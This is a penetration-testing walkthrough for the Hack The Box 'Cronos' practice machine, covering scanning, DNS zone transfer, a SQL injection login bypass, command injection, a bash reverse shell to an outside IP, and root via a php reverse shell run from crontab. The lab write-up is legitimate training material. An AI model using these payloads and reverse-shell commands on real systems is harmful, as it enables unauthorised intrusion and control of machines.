Hack The Box (HTB) Writeup - Cronos
Today we will solve Cronos Box of Medium difficulty level from Hack The Box (HTB). If you are new, HTB is a practice online lab to learn penetration testing. This box is helpful in preparing for OSCP. certification.
Summary:
- Run Nmap to find open ports and services
- Enumerate DNS
- Add IP and identified hostnames in /etc/hosts
- Enumerate HTTP
- Identify login on admin.cronos.htb
- Use SQL Injection to bypass login
- Check for Command Injection
- Reverse the shell and locate user.txt flag
- Transfer Linux Privilege scripts from the local machine to low privileged machine
- Results
- php reverse shell in crontab
- Reverse shell and locate root.txt
Start with Nmap
Initial Scan
nmap 10.10.10.13
Run default scripts
nmap -sC -sV 10.10.10.13
Scan all ports
nmap -p- 10.10.10.13
Run UDP scan
nmap -sU 10.10.10.13
Using dig command to identify urls
dig axfr cronos.htb @10.10.10.13
Add urls in /etc/hosts by using nano /etc/hosts
Check admin.cronos.htb on browser
Try using SQL Injection Payloads from link, able to login successfully by using below payload
' or 1=1 limit 1 --
-+
Try command injection, use ls command. It confirms command injection vulnerability is available in web application.
Intercept request in Burpsuite and use command injection vulnerability to get a reverse shell.
bash -c 'bash -i /dev/tcp/10.10.14.16/8000 0>&1'
Got user.txt
Privilege escalation
Spawn a tty shell
python -c 'import pty; pty.spawn("/bin/sh")'
Run below commands to know the flavor of box
uname -a
cat /proc/version
cat /etc/issue
Identify Privilege Escalation script for Ubuntu 16.04.2. Click Here to download on local machine and then transfer it on compromised machine.
Run Privilege Escalation script
./linpeas.sh
Found /var/www/laravel/artisan on run of linpeas.sh script
Check crontab
Download php-reverse-shell.php script
Change local IP and port number
To catch a reverse shell, set nc and run php script
Got a reverse shell
Got root.
Subscribe us to receive more such articles updates in your email.
If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!
Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.